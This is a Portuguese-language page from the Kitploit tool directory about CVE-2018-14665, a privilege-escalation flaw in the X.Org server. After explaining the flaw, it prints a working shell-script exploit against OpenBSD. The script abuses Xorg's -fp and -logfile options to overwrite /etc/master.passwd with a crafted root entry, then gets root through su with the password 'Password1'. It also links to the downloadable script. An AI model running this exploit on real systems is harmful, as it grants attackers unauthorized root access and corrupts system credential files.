Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-14665 — OpenBsd_CVE-2018-14665 | Kitploit
Ferramentas/GitHubGitHub/jas502n/cve-2018-14665
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubjas502n/cve-2018-14665

CVE-2018-14665

OpenBsd_CVE-2018-14665

Ver Repositório
177há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-14665

0x00 Introdução

O pesquisador de segurança indiano Narendra Shinde descobriu uma vulnerabilidade crítica de escalonamento de privilégios para root (CVE-2018-14665) no pacote X.Org Server, que afeta as principais distribuições Linux, incluindo OpenBSD, Debian, Ubuntu, CentOS, Red Hat e Fedora.

O projeto Xorg X fornece uma implementação de código aberto do sistema de janelas X (também conhecido como X11, ou simplesmente X, que é um sistema de janelas para exibição de bitmap. Ele fornece a estrutura básica para ambientes GUI: desenhar e mover janelas em dispositivos de exibição, além da interação com mouse e teclado.

Shinde descobriu que o servidor Xorg X não lida nem valida corretamente os argumentos de pelo menos os dois seguintes parâmetros de linha de comando:

-modulepath: define o caminho dos diretórios para pesquisar módulos do servidor Xorg,

-logfile: define um novo arquivo de log para o servidor Xorg, em vez de usar o log padrão localizado em /var/log/Xorg.n.log na maioria das plataformas.

De acordo com Narendra Shinde, usuários com baixos privilégios podem explorar isso para executar código malicioso e sobrescrever qualquer arquivo do sistema.

A vulnerabilidade foi introduzida no pacote X.Org Server versão 1.19.0 há mais de dois anos.

O Xorg emitiu um boletim de segurança sobre a vulnerabilidade CVE-2018-14665.

root@kitploit:~
"Quando o servidor X é executado com privilégios elevados (ou seja, instalado Xorg com o bit setuid definido e iniciado por um usuário não root)." lê-se no aviso do Xorg.

"O parâmetro -modulepath pode ser usado para especificar um caminho inseguro para módulos a serem carregados no servidor X, permitindo a execução de código não privilegiado em um processo privilegiado.

Devido a uma verificação incorreta ao analisar as opções, o parâmetro -logfile pode ser usado para sobrescrever arquivos arbitrários no sistema."

0x01 root

O especialista em segurança Matthew Hickey também publicou um código de exploração de prova de conceito que permite a um invasor comprometer um sistema vulnerável com 3 comandos ou menos.

O #0day LPE do Openbsd via CVE-2018-14665 pode ser acionado a partir de uma sessão SSH remota, sem necessidade de estar no console local. O invasor pode literalmente assumir o controle do sistema afetado com 3 comandos ou menos.

Script de exploração: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

POC:

root@kitploit:~
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was 
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
# 
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself 
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a 
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -

Nota: Após a exploração bem-sucedida, a nova senha de root é Password1. O arquivo /etc/passwd original do sistema será copiado em /etc/master.passwd.old

0x02 Links de referência

root@kitploit:~
https://twitter.com/hackerfantastic

https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

Baixar ferramenta